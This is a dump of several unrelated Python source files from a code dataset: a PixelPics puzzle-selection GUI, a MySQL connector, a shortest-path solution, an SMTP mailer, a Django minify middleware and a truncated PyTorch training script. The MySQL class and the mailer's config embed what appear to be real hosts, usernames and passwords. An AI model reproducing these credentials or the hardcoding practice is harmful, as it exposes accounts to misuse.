self.text_offset_x += 5.0\n self.text_offset_y -= 5.0\n\n\n def On_Exit(self):\n 
GUI_element.On_Exit(self)\n self.title.Kill()\n self.mascot_object.Kill()\n self.puzzle_name.Kill()\n self.puzzle_best_time.Kill()\n self.puzzle_size.Kill()\n if not self.author is None:\n self.author.Kill()\n\n \n\nclass GUI_puzzle_select_go_back(GUI_element_button):\n generic_button = False\n\n def __init__(self, game, parent = None):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.z = self.parent.z - 1\n self.image = self.game.core.media.gfx['gui_button_go_back']\n self.gui_init()\n self.x = 8\n self.y = self.game.settings['screen_height'] - self.image.height\n self.width = 128\n\n\n def mouse_left_up(self):\n GUI_element_button.mouse_left_up(self)\n if self.game.manager.user_created_puzzles:\n self.game.gui.fade_toggle(lambda: self.game.switch_game_state_to(GAME_STATE_SHARING, gui_state = GUI_STATE_SHARING_DOWNLOADED), speed = 20)\n else:\n self.game.gui.fade_toggle(lambda: self.game.switch_game_state_to(GAME_STATE_CATEGORY_SELECT), speed = 20)\n\n\n\nclass Hover_text(Process):\n def __init__(self, game, x, y, font = \"puzzle_select_hover_text\", x_pad = 20.0):\n Process.__init__(self)\n self.game = game\n self.x = x\n self.y = y\n self.z = Z_GUI_OBJECT_LEVEL_5\n self.x_pad = x_pad\n self.current_text = \"\"\n \n self.text = Text(\n self.game.core.media.fonts[font],\n self.x,\n self.y,\n TEXT_ALIGN_CENTER,\n self.current_text,\n )\n self.text.colour = (1.0, 1.0, 1.0)\n self.text.shadow = 2\n self.text.shadow_colour = (.3, .3, .3, .5)\n\n self.text.z = self.z - 1\n\n # Draw strategy data\n self.draw_strategy = \"\"\n self.draw_strategy_call_parent = False\n self.primitive_square_filled = True\n self.primitive_square_colour = (0.0, 0.0, 0.0, .3)\n \n\n def set_text(self, text):\n self.current_text = text\n self.text.text = self.current_text\n\n if not text == \"\":\n self.draw_strategy = \"primitive_square\"\n self.primitive_square_width = self.text.text_width + (self.x_pad * 2)\n self.primitive_square_height = self.text.text_height + 4.0\n self.primitive_square_x = self.x - (self.text.text_width/2) - self.x_pad\n self.primitive_square_y = self.y - (self.text.text_height/2) - 2.0\n else:\n self.draw_strategy = \"\"\n \n\n def On_Exit(self):\n self.text.Kill()\n\n\n\nclass GUI_puzzle_puzzle_item(GUI_element_button):\n generic_button = False\n \n def __init__(self, game, parent, puzzle_filename, puzzle_info, puzzle_num):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.puzzle_filename = puzzle_filename\n self.puzzle_info = puzzle_info\n self.puzzle_num = puzzle_num\n self.image = self.game.core.media.gfx['gui_puzzle_select_puzzle_box']\n self.gui_init()\n self.width = 128\n self.height = 128\n self.saved_icon = None\n self.solved_icon = None\n self.star_icon = None\n self.full_game_only_icon = None\n self.number_text = None\n self.monochrome_picture = None\n self.cleared = False\n \n column = self.puzzle_num % 5\n row = self.puzzle_num / 5\n puzzle_box_size = (870, 625)\n self.x = float((puzzle_box_size[0] / 5) * column) + self.width - (self.width / 2)\n self.y = 100.0 + float((puzzle_box_size[1] / 5) * row) + self.height - (self.height / 2) - 130\n\n if self.game.settings['screen_width'] > puzzle_box_size[0]:\n self.x += (self.game.settings['screen_width'] - puzzle_box_size[0]) / 2\n if self.game.settings['screen_height'] > puzzle_box_size[1]:\n self.y += (self.game.settings['screen_height'] - puzzle_box_size[1]) / 2\n \n self.z = Z_GUI_OBJECT_LEVEL_4\n\n if DEMO:\n puzzle_file_path = os.path.join(self.game.core.path_game_pack_directory, 
self.game.manager.current_puzzle_pack, self.puzzle_filename)\n if not os.path.exists(puzzle_file_path):\n self.disabled = True\n self.full_game_only_icon = Full_Game_Only_Notice(self.game, self)\n return\n\n if self.game.manager.current_pack.uuid in self.game.player.cleared_puzzles and self.puzzle_filename in self.game.player.cleared_puzzles[self.game.manager.current_pack.uuid]:\n self.cleared = True\n\n self.number_text = Text(\n self.game.core.media.fonts['puzzle_select_number'],\n self.x,\n self.y + 5,\n TEXT_ALIGN_TOP_RIGHT,\n str(self.puzzle_num + 1)\n )\n self.number_text.z = self.z\n self.number_text.colour = (0.0, 0.0, 0.0) if self.cleared else (0.3, 0.3, 0.3)\n self.number_text.shadow = 2\n self.number_text.shadow_colour = (.5, .5, .5, .5)\n \n if self.cleared:\n path_dir = self.game.core.path_user_pack_directory if self.game.manager.user_created_puzzles else self.game.core.path_game_pack_directory\n\n self.monochrome_picture = GUI_puzzle_puzzle_item_picture(\n self.game,\n self,\n self.x + (self.width / 2),\n self.y + (self.height / 2),\n puzzle_path = os.path.join(path_dir, self.game.manager.current_puzzle_pack, self.puzzle_filename),\n in_colour = False,\n fade_in_time = None\n )\n self.coloured_picture = GUI_puzzle_puzzle_item_picture(\n self.game,\n self,\n self.x + (self.width / 2),\n self.y + (self.height / 2),\n puzzle_path = os.path.join(path_dir, self.game.manager.current_puzzle_pack, self.puzzle_filename),\n in_colour = True,\n fade_in_time = None\n )\n self.coloured_picture.alpha = 0.0\n else:\n self.monochrome_picture = GUI_puzzle_puzzle_item_picture_unsolved(self.game, self)\n \n if self.game.manager.user_created_puzzles:\n save_path = self.game.core.path_saves_user_directory\n else:\n save_path = self.game.core.path_saves_game_directory\n\n if os.path.exists(os.path.join(save_path, self.game.manager.current_puzzle_pack + \"_\" + self.puzzle_filename + FILE_SAVES_EXTENSION)):\n self.saved_icon = GUI_puzzle_puzzle_item_saved_icon(self.game, self)\n \n if self.cleared:\n if self.game.manager.current_pack.uuid in self.game.player.puzzle_scores and self.puzzle_filename in self.game.player.puzzle_scores[self.game.manager.current_pack.uuid]:\n if self.game.manager.current_pack.freemode:\n seconds = int(self.game.player.puzzle_scores[self.game.manager.current_pack.uuid][self.puzzle_filename][0] / 60)\n if int(seconds / 60) <= 30:\n self.star_icon = GUI_puzzle_puzzle_item_star_icon(self.game, self)\n else:\n if self.game.player.puzzle_scores[self.game.manager.current_pack.uuid][self.puzzle_filename][1] == 4:\n self.star_icon = GUI_puzzle_puzzle_item_star_icon(self.game, self)\n if self.star_icon is None:\n self.solved_icon = GUI_puzzle_puzzle_item_solved_icon(self.game, self)\n\n\n def Execute(self):\n self.image_sequence = 1\n GUI_element_button.Execute(self)\n \n\n def mouse_left_down(self):\n if self.disabled:\n return\n self.image_sequence = 2\n if self.cleared:\n self.monochrome_picture.press()\n self.coloured_picture.press()\n else:\n self.monochrome_picture.press()\n \n\n def mouse_left_up(self):\n if self.disabled:\n return\n GUI_element_button.mouse_left_up(self)\n self.game.manager.current_puzzle_file = self.puzzle_filename\n if self.saved_icon:\n self.game.manager.load_puzzle_state_from = self.game.manager.current_puzzle_pack + \"_\" + self.puzzle_filename + FILE_SAVES_EXTENSION\n self.game.gui.fade_toggle(lambda: self.game.switch_game_state_to(GAME_STATE_PUZZLE), speed = 40, stop_music = True)\n if not self.cleared:\n self.monochrome_picture.un_press()\n\n \n def 
mouse_not_over(self):\n if self.disabled:\n return\n if self.cleared:\n if self.coloured_picture.alpha > 0.0:\n self.coloured_picture.alpha -= .1\n else:\n self.monochrome_picture.un_press()\n self.monochrome_picture.stop_pulse()\n self.hover_sound = False\n\n \n def mouse_over(self):\n if self.disabled:\n return\n if self.play_sound and not self.hover_sound:\n self.game.core.media.sfx['button_hover'].play(0)\n self.hover_sound = True\n \n if self.cleared: \n if self.coloured_picture.alpha < 1.0:\n self.coloured_picture.alpha += .1\n \n self.parent.puzzle_name.set_text(str(self.puzzle_info[0]))\n\n if self.game.manager.current_pack.uuid in self.game.player.puzzle_scores and self.puzzle_filename in self.game.player.puzzle_scores[self.game.manager.current_pack.uuid]:\n seconds = int(self.game.player.puzzle_scores[self.game.manager.current_pack.uuid][self.puzzle_filename][0] / 60)\n minutes = int(seconds / 60)\n hours = int(minutes / 60)\n seconds = seconds - (minutes * 60)\n minutes = minutes - (hours * 60)\n time_text = str(hours).rjust(2, \"0\") + \":\" + str(minutes).rjust(2, \"0\") + \":\" + str(seconds).rjust(2, \"0\")\n self.parent.puzzle_best_time.set_text(\"Best time: \" + str(time_text))\n else:\n self.parent.puzzle_best_time.set_text(\"Best time: 00:00:00\")\n else:\n self.parent.puzzle_name.set_text(\"? ? ? ?\")\n self.parent.puzzle_best_time.set_text(\"Best time: 00:00:00\")\n self.monochrome_picture.pulse()\n \n self.parent.puzzle_size.set_text(str(self.puzzle_info[1]) + \"x\" + str(self.puzzle_info[2]))\n \n\n def On_Exit(self):\n GUI_element_button.On_Exit(self)\n if self.number_text:\n self.number_text.Kill()\n if self.monochrome_picture:\n self.monochrome_picture.Kill()\n if self.full_game_only_icon:\n self.full_game_only_icon.Kill()\n if self.saved_icon:\n self.saved_icon.Kill()\n if self.cleared:\n self.coloured_picture.Kill()\n if self.solved_icon:\n self.solved_icon.Kill() \n if self.star_icon:\n self.star_icon.Kill()\n\n\nclass Full_Game_Only_Notice(Process):\n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.image = self.game.core.media.gfx['full_game_stamp']\n self.z = self.parent.z -1\n self.x = self.parent.x + 100\n self.y = self.parent.y + 100\n self.scale = .7\n\n\n\nclass GUI_puzzle_puzzle_item_picture_unsolved(Process):\n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.image = self.game.core.media.gfx['gui_puzzle_image_unsolved']\n self.set_position()\n self.width = self.image.width \n self.height = self.image.height\n self.z = Z_GUI_OBJECT_LEVEL_5\n self.dir = 1\n\n\n def pulse(self):\n if self.dir == 1:\n if self.scale > .8:\n self.scale -= .01\n else:\n self.scale = .8\n self.dir = 2\n else:\n if self.scale < 1.0:\n self.scale += .01\n else:\n self.scale = 1.0\n self.dir = 1\n \n\n def stop_pulse(self):\n if self.scale < 1.0:\n self.scale += .01\n else:\n self.scale = 1.0\n self.dir = 1\n\n\n def press(self):\n self.set_position(True)\n\n\n def un_press(self):\n self.set_position()\n \n \n def set_position(self, shift = False):\n self.x = self.parent.x + (self.parent.width / 2)\n self.y = self.parent.y + (self.parent.height / 2)\n if shift:\n self.x += 2\n self.y += 2\n\n\n def get_screen_draw_position(self):\n return (self.x - ((self.image.width * self.scale) / 2), self.y - ((self.image.height * self.scale) / 2))\n\n\n\nclass GUI_puzzle_puzzle_item_picture(Puzzle_image):\n def Execute(self):\n self.set_position()\n 
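# (Sketch) the tick-count to HH:MM:SS conversion in mouse_over above\r\n        # could be factored into a helper, assuming 60 ticks per second:\r\n        #   def fmt(ticks):\r\n        #       s = ticks // 60\r\n        #       return '%02d:%02d:%02d' % (s // 3600, s % 3600 // 60, s % 60)\r\n        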
Puzzle_image.Execute(self)\n\n\n def gui_init(self):\n Puzzle_image.gui_init(self)\n #self.draw_strategy = \"gui_designer_monochrome_puzzle_image\" \n \n def set_position_z_scale(self, x, y): \n self.z = Z_GUI_OBJECT_LEVEL_5\n if self.in_colour:\n self.z -= 1\n scale_start = self.height if self.height > self.width else self.width\n self.scale = .01 * ((84.0 / scale_start) * 100)\n self.start_x = x\n self.start_y = y\n self.set_position()\n \n\n def set_position(self, shift = False):\n self.x = self.start_x - ((self.width * self.scale) / 2)\n self.y = self.start_y - ((self.height * self.scale) / 2)\n if shift:\n self.x += 2\n self.y += 2\n\n \n def press(self):\n self.set_position(True)\n \n\n\nclass GUI_puzzle_puzzle_item_saved_icon(Process):\n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.x = self.parent.x - 40 + (self.parent.width / 2)\n self.y = self.parent.y + 45 + (self.parent.height / 2)\n self.z = Z_GUI_OBJECT_LEVEL_6\n self.image = self.game.core.media.gfx['gui_puzzle_select_saved_icon']\n self.rotation = 16\n\n\n\nclass GUI_puzzle_puzzle_item_solved_icon(Process):\n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.x = self.parent.x + 40 + (self.parent.width / 2)\n self.y = self.parent.y + 45 + (self.parent.height / 2)\n self.z = Z_GUI_OBJECT_LEVEL_6\n self.image = self.game.core.media.gfx['gui_puzzle_select_solved_icon']\n\n\n\nclass GUI_puzzle_puzzle_item_star_icon(Process):\n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.x = self.parent.x + 40 + (self.parent.width / 2)\n self.y = self.parent.y + 45 + (self.parent.height / 2)\n self.z = Z_GUI_OBJECT_LEVEL_6\n self.image = self.game.core.media.gfx['gui_puzzle_select_star_icon']\n\n\n\n\nclass GUI_puzzle_select_rating_star_container(GUI_element):\n \n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n\n self.x = self.game.settings['screen_width'] - 225\n self.y = self.game.settings['screen_height'] - 130\n self.z = Z_GUI_OBJECT_LEVEL_5\n\n self.text = Text(\n self.game.core.media.fonts[\"puzzle_select_rate_pack_text\"],\n self.x + 15,\n self.y - 35,\n TEXT_ALIGN_TOP_LEFT,\n \"Rate this pack!\"\n )\n self.text.z = Z_GUI_OBJECT_LEVEL_6\n self.text.colour = (.4, .4, .4)\n self.text.shadow = 2\n self.text.shadow_colour = (1.0, 1.0, 1.0, .5)\n \n self.width = 42 * 5\n self.height = 40\n #self.x = self.text.text_width + 32\n self.gui_init()\n\n self.hovering = False\n\n self.stars = []\n for i in range(5):\n self.stars.append(GUI_puzzle_select_rating_star_star(self.game, self, i))\n\n\n def mouse_over(self):\n self.hovering = True\n\n\n def mouse_out(self):\n self.hovering = False\n\n\n def On_Exit(self):\n GUI_element.On_Exit(self)\n self.text.Kill()\n \n\n\nclass GUI_puzzle_select_rating_star_star(GUI_element):\n \n def __init__(self, game, parent, num):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.num = num\n self.image = self.game.core.media.gfx['gui_puzzle_select_rating_star']\n self.x = self.parent.x + (42 * num)\n self.y = self.parent.y\n self.width = 40\n self.height = 40\n self.z = Z_GUI_OBJECT_LEVEL_6\n self.gui_init()\n\n\n def update(self):\n if self.parent.hovering:\n return\n\n self.image_sequence = 1\n \n if self.game.manager.current_pack.uuid in self.game.player.pack_ratings:\n if self.num < self.game.player.pack_ratings[self.game.manager.current_pack.uuid]:\n 
self.image_sequence = 2\n\n\n def mouse_over(self):\n self.image_sequence = 2\n for i in range(5):\n self.parent.stars[i].image_sequence = 2 if i <= self.num else 1\n\n\n def rate(self, response):\n self.game.rate_pack(self.game.manager.current_pack.uuid, self.num + 1)\n\n\n def mouse_left_up(self):\n data = {\n 'pack' : self.game.manager.current_pack.uuid,\n 'rater' : self.game.author_id,\n 'rating' : self.num + 1\n }\n self.parent.parent.make_request_to_server(\"rate_pack/\", data, self.rate, task_text = \"Rating pack\")\n \n\n\nclass GUI_puzzle_select_report(GUI_element_button):\n generic_button = False\n \n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.x = self.game.settings['screen_width'] - 180\n self.y = self.game.settings['screen_height'] - 70\n self.z = Z_GUI_OBJECT_LEVEL_2\n self.image = self.game.core.media.gfx['gui_puzzle_select_button_report']\n self.gui_init()\n\n\n def mouse_left_up(self):\n GUI_element_button.mouse_left_up(self)\n GUI_puzzle_select_report_dialog(self.game, self.parent)\n\n\n\nclass GUI_puzzle_select_report_dialog(GUI_element_window):\n title = \"Report Puzzle\"\n height = 195\n width = 490\n objs = {}\n\n def __init__(self, game, parent = None):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.gui_init()\n\n \n def gui_init(self):\n self.z = Z_GUI_OBJECT_LEVEL_8\n self.x = (self.game.settings['screen_width'] / 2) - (self.width / 2)\n self.y = (self.game.settings['screen_height'] / 2) - (self.height / 2)\n GUI_element_window.gui_init(self)\n\n self.objs = {}\n y = 0\n for text in [\"Using this box you can report a puzzle as inappropriate.\", \"Select the reason for the report and submit it.\", \"It will be dealt with as soon as possible.\"]:\n txt = Text(self.game.core.media.fonts['window_text'], self.x + 28, self.y + 45 + y, TEXT_ALIGN_TOP_LEFT, text)\n txt.z = self.z - 2\n txt.colour = (0.3,0.3,0.3)\n self.objs['text_' + str(y)] = txt\n y += txt.text_height + 2\n\n GUI_puzzle_select_report_dialog_submit_button(self.game, self)\n GUI_puzzle_select_report_dialog_cancel_button(self.game, self)\n\n txt = Text(self.game.core.media.fonts['window_text'], self.x + 30, self.y + 117, TEXT_ALIGN_TOP_LEFT, \"Report type: \")\n txt.z = self.z - 2\n txt.colour = (0.3, 0.3, 0.3)\n self.objs['text_dropdown'] = txt \n self.report_type = GUI_puzzle_select_report_type_dropdown(self.game, self)\n \n self.game.gui.block_gui_keyboard_input = True\n self.x = 0\n self.y = 0\n self.width = self.game.settings['screen_width']\n self.height = self.game.settings['screen_height']\n\n self.draw_strategy = \"primitive_square\"\n self.draw_strategy_call_parent = False\n self.primitive_square_width = self.x + self.width\n self.primitive_square_height = self.y + self.height\n self.primitive_square_x = 0.0\n self.primitive_square_y = 0.0\n self.primitive_square_colour = (0.0, 0.0, 0.0, .4)\n\n\n def report_pack(self, response):\n self.parent.report_button.Kill()\n self.parent.report_button = None\n GUI_element_dialog_box(self.game, self.parent, \"Pack reported\", [\"This pack has been reported to Stompy Blondie\", \"and will be investigated as soon as possible.\", \"Thank you for helping make PixelPics better!\"])\n self.Kill()\n \n\n def On_Exit(self):\n GUI_element_window.On_Exit(self)\n self.game.gui.block_gui_keyboard_input = False\n for x in self.objs:\n self.objs[x].Kill()\n\n\n\nclass GUI_puzzle_select_report_type_dropdown(GUI_element_dropdown):\n display_width = 300\n\n dropdown_options = [\n 
{'text' : \"Inappropriate or offensive content\", 'data' : 'offensive'},\n {'text' : \"Pack is broken in some way\", 'data' : 'broken'},\n {'text' : \"Misleading pack name\", 'data' : 'wrong'},\n {'text' : \"Other\", 'data' : 'other'}\n ]\n\n selected_item = 0\n \n def __init__(self, game, parent = None):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.display_x = self.parent.x + 140\n self.display_y = self.parent.y + 110\n self.display_z = self.parent.z - 2\n self.gui_init()\n\n\n\nclass GUI_puzzle_select_report_dialog_submit_button(GUI_element_button):\n generic_button = True\n generic_button_text = \"Send\"\n\n def __init__(self, game, parent = None):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.z = self.parent.z - 2\n self.x = self.parent.x + (self.parent.width / 2) - (self.width) - 70\n self.y = self.parent.y + 150\n self.gui_init()\n\n\n def mouse_left_up(self):\n GUI_element_button.mouse_left_up(self)\n data = {\n 'pack' : self.game.manager.current_pack.uuid,\n 'reporter' : self.game.author_id,\n 'report_type' : self.parent.report_type.dropdown_options[self.parent.report_type.selected_item]['data'] \n }\n self.parent.parent.make_request_to_server(\"report_pack/\", data, self.parent.report_pack, task_text = \"Reporting pack\")\n\n\n\nclass GUI_puzzle_select_report_dialog_cancel_button(GUI_element_button):\n generic_button = True\n generic_button_text = \"Cancel\"\n\n def __init__(self, game, parent = None):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.z = self.parent.z - 2\n self.x = self.parent.x + (self.parent.width / 2) + 10\n self.y = self.parent.y + 150\n self.gui_init()\n\n\n def mouse_left_up(self):\n GUI_element_button.mouse_left_up(self)\n self.parent.Kill()\n","repo_name":"Fiona/PixelPicsCPP","sub_path":"logic/gui/puzzle_select.py","file_name":"puzzle_select.py","file_ext":"py","file_size_in_byte":26243,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"23983142374","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'HeZhen'\n\nfrom ics.utils.mysql.mysqldb import MySQLUtil\n\nclass MySQLInit(MySQLUtil):\n\n\n def __init__(self):\n self.inited = False\n self.display = True\n self.init('rm-bp11towre3n815e78o.mysql.rds.aliyuncs.com', 'gouchao', 'Gouchao!2018', 'gsxt_test', 3306, min_connections=3)\n\n ","repo_name":"stonegithubs/spiders","sub_path":"project/spiders/ics/task/gsxt/etl/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35668932930","text":"\"\"\"Django middleware.\"\"\"\nfrom __future__ import annotations\nimport logging\nimport re\nimport typing\n\nfrom django.conf import settings\nfrom django.core.cache import InvalidCacheBackendError, caches\nfrom django.core.cache.backends.base import BaseCache\nfrom django.http import HttpRequest, HttpResponse\n\nfrom .base import html_minify\n\n\nhash_func: typing.Callable\ntry:\n import xxhash\n\n hash_func = xxhash.xxh64\nexcept ImportError:\n import hashlib\n\n hash_func = hashlib.md5\n\n\nLOGGER_INST: logging.Logger = logging.getLogger(__file__)\nCACHE_PREFIX: str = \"hmin-\"\nMINIFICATION_ENABLED: bool = getattr(settings, \"HTML_MINIFY\", not settings.DEBUG)\nREMOVE_COMMENTS: bool = getattr(settings, \"HMIN_REMOVE_COMMENTS\", True)\nUSE_CACHE: bool = getattr(settings, \"HMIN_USE_CACHE\", True)\nTIMEOUT: bool = getattr(settings, 
\"HMIN_CACHE_TIMEOUT\", 3600)\nEXCLUDE_PAGES: list = []\n\n\n# get cache provider, or disable caching\nif USE_CACHE:\n try:\n cache_instance: BaseCache = caches[getattr(settings, \"HMIN_CACHE_BACKEND\", \"default\")]\n except (InvalidCacheBackendError, NameError):\n USE_CACHE = False\n\n\n# process exclude pages\nif hasattr(settings, \"HMIN_EXCLUDE\"):\n EXCLUDE_PAGES = [re.compile(url_pattern) for url_pattern in settings.HMIN_EXCLUDE]\n\n\n# Middlewares starts here\nclass _BasicMiddleware:\n \"\"\"Basic middleware mixin.\"\"\"\n\n def __init__(self, get_response: typing.Callable) -> None:\n self.get_response: typing.Callable = get_response\n\n\nclass MarkMiddleware(_BasicMiddleware):\n \"\"\"This middleware suposed to be first.\n\n It mean to be used with cache middlewares in django.\n \"\"\"\n\n def __call__(self, request: HttpRequest) -> HttpResponse:\n \"\"\"Allow minification flag.\"\"\"\n request.need_to_minify = True\n return self.get_response(request)\n\n\nclass MinMiddleware(_BasicMiddleware):\n \"\"\"Minification middleware itself.\"\"\"\n\n def __call__(self, request: HttpRequest) -> HttpResponse:\n \"\"\"Minification goes here.\"\"\"\n response: HttpResponse = self.get_response(request)\n\n # prevent from minifying cached pages\n if not MINIFICATION_ENABLED or not hasattr(request, \"need_to_minify\") or not request.need_to_minify:\n return response\n\n # prevent from minifying excluded pages\n if EXCLUDE_PAGES:\n current_path: str = request.path.lstrip(\"/\")\n for one_regex in EXCLUDE_PAGES:\n if one_regex.match(current_path):\n return response\n\n if \"Content-Type\" in response and \"text/html\" in response[\"Content-Type\"]:\n body_content: str = response.content.decode()\n minified_content: str = \"\"\n if USE_CACHE:\n cache_key: str = f\"{CACHE_PREFIX}{hash_func(response.content).hexdigest()}\"\n cached_page: typing.Optional[str] = cache_instance.get(cache_key)\n if cached_page:\n minified_content = cached_page\n else:\n minified_content = html_minify(body_content, REMOVE_COMMENTS)\n cache_instance.set(cache_key, minified_content, TIMEOUT)\n else:\n minified_content = html_minify(body_content, REMOVE_COMMENTS)\n response.content = minified_content.encode()\n return response\n","repo_name":"xfenix/django-hmin","sub_path":"hmin/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"39"} +{"seq_id":"14740315832","text":"import sys, collections\n\nN = int(sys.stdin.readline().rstrip())\nM = int(sys.stdin.readline().rstrip())\nINF = sys.maxsize\nP = collections.defaultdict(collections.defaultdict)\n\nfor _ in range(M):\n S, D, C = map(int, sys.stdin.readline().split())\n if S in P:\n if D in P[S]:\n P[S][D] = min(C, P[S][D])\n else:\n P[S][D] = C\n else:\n P[S][D] = C\n\nD = [INF for _ in range(N + 1)]\nstart, end = map(int, sys.stdin.readline().split())\n\ndef bfs(start):\n D[start] = 0\n queue = collections.deque()\n queue.append(start)\n visited = [True] + [False for _ in range(N)]\n\n while queue:\n cur = queue.popleft()\n visited[cur] = True\n if cur == end: \n return D[end]\n\n for next in P[cur].keys():\n if not visited[next]:\n left = D[cur] + P[cur][next]\n right = D[next]\n if left < right:\n D[next] = left\n \n min_index, min_distance = -1, INF\n for index in range(1, N + 1):\n if not visited[index]:\n if D[index] < min_distance:\n min_index, min_distance = index, D[index]\n queue.append(min_index)\n return 
\nprint(bfs(start))","repo_name":"PARKJUHONG123/coding-test","sub_path":"N1916.py","file_name":"N1916.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20436105692","text":"#!/usr/bin/env python3\n# coding: UTF-8\n'''\n othermailer.py - Just another simple script to send emails via TLS\n Sergio Fernandez \n Usage: python3 othermailer.py --help\n'''\n\nimport sys\nimport smtplib\nimport argparse\nimport socket\nimport datetime\nfrom random import choice\nfrom string import ascii_lowercase, digits\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\n# Configure your sender settings\n#config = {\n#    'USER': \"user@domain\",\n#    'PASS': \"password\",\n#    'HOST': \"mail.host.name\",\n#    'PORT': \"587\"\n#}\n\nconfig = {\n    'USER': \"beserker@proyectopqmc.com\",\n    'PASS': \"beserker_99\",\n    'HOST': \"mail.gandi.net\",\n    'PORT': \"587\"\n}\n\n# Parse arguments about receiver\nPARSER = argparse.ArgumentParser()\nPARSER.add_argument(\"-s\", \"--subject\", help=\"Mail subject\", type=str)\nPARSER.add_argument(\"-t\", \"--to\", help=\"Destination emails, separated by comma\", type=str)\nPARSER.add_argument(\"-b\", \"--body\", help=\"Message body\", type=str)\nPARSER.add_argument(\"-a\", \"--attach\", help=\"Text file to attach\", type=str)\nARGS = PARSER.parse_args()\n\n# Headers values. In most cases, default values are ok for text-only content\nCHARSET = \"UTF-8\"\nMAILER_ID = \"Othermailer.py - https://github.com/ElAutoestopista/othermailer.py\"\nDATE_STR = datetime.datetime.now().strftime(\"%a, %d %b %Y %H:%M:%S %z\")\n\n# It's considered a good practice that MUA generates a message ID, so we are going to generate one randomly.\nHOSTNAME = socket.getfqdn()\nRAND_STR = ''.join(choice(ascii_lowercase + digits) for i in range(20))\nMessage_Id = \"<\"+RAND_STR+\"@\"+HOSTNAME+\">\"\n\n# Check arguments\nif ARGS.subject:\n    Subject = ARGS.subject\nelse:\n    print(\"No subject defined\")\n    sys.exit(1)\nif ARGS.body:\n    Msg = MIMEText(ARGS.body, 'plain')\nelse:\n    print(\"No message defined\")\n    sys.exit(1)\nif ARGS.to:\n    To = [x.strip() for x in ARGS.to.split(',')]\nelse:\n    print(\"No destination defined\")\n    sys.exit(1)\nif ARGS.attach:\n    try:\n        f = open(ARGS.attach)\n        Attachment = MIMEText(f.read())\n    except Exception as e:\n        print(e)\n        sys.exit(1)\nelse:\n    print(\"No file for attachment specified\")\n\n# Build message headers\nMessage = MIMEMultipart()\nMessage['From'] = config.get('USER')\nMessage['To'] = ','.join(To)\nMessage['Date'] = DATE_STR\nMessage['Subject'] = Subject\nMessage['Message-ID'] = Message_Id\nMessage['X-Mailer'] = MAILER_ID\nMessage['CHARSET'] = CHARSET\nMessage.attach(Msg)\nif ARGS.attach:\n    Attachment.add_header('Content-Disposition', 'attachment', filename=ARGS.attach)\n    Message.attach(Attachment)\n\n# Connect and try to send\ntry:\n    Othermailer = smtplib.SMTP(config.get('HOST'), config.get('PORT'))\n    Othermailer.ehlo()\n    Othermailer.starttls()\n    Othermailer.login(config.get('USER'), config.get('PASS'))\n    Othermailer.sendmail(config.get('USER'), To, Message.as_string())\n    print(\"Sent\")\nexcept smtplib.SMTPException as Error:\n    print(\"ERROR: \" + str(Error))\n","repo_name":"SergioFernandezCordero/othermailer.py","sub_path":"othermailer.py","file_name":"othermailer.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39839457669","text":"from 
__future__ import print_function, division, absolute_import\nimport argparse\nimport os\nimport shutil\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nfrom collections import OrderedDict\nfrom efficientnet_pytorch import EfficientNet\n\nimport sys\nsys.path.append('.')\nfrom utils.utils import SceneData, FocalLoss, mixup\nfrom utils.model import create_model\nfrom mmcv import Config\nfrom utils.transform import image_transforms\n\nparser = argparse.ArgumentParser(description='PyTorch ImageNet Training')\nparser.add_argument('config', help='train config file path')\n\nargs = parser.parse_args()\ncfg = Config.fromfile(args.config)\n\ndef main():\n # global args, best_prec1, cfg \n model = create_model(cfg.model.arch, cfg.model.num_classes, cfg.model.pretrained)\n\n best_prec1 = 0\n # optionally resume from a checkpoint\n if cfg.resume:\n if os.path.isfile(cfg.resume):\n print(\"=> loading checkpoint '{}'\".format(cfg.resume))\n checkpoint = torch.load(cfg.resume)\n cfg.start_epoch = checkpoint['epoch']\n best_prec1 = checkpoint['best_prec1']\n state_dict = checkpoint['state_dict']\n \n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n name = k[7:]\n new_state_dict[name] = v\n\n model.load_state_dict(new_state_dict)\n print(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(cfg.resume, checkpoint['epoch']))\n else:\n print(\"=> no checkpoint found at '{}'\".format(cfg.resume))\n\n cudnn.benchmark = True\n\n # Data loading code\n print(\"Loading data...\")\n traindir = os.path.join(cfg.data, 'train')\n valdir = os.path.join(cfg.data, 'val')\n\n train_loader = torch.utils.data.DataLoader(\n SceneData(txt_file=cfg.annotations.train, \n image_dir=cfg.data, \n mode='train', \n transform=image_transforms['train']),\n batch_size=cfg.batch_size, shuffle=True,\n num_workers=cfg.workers, 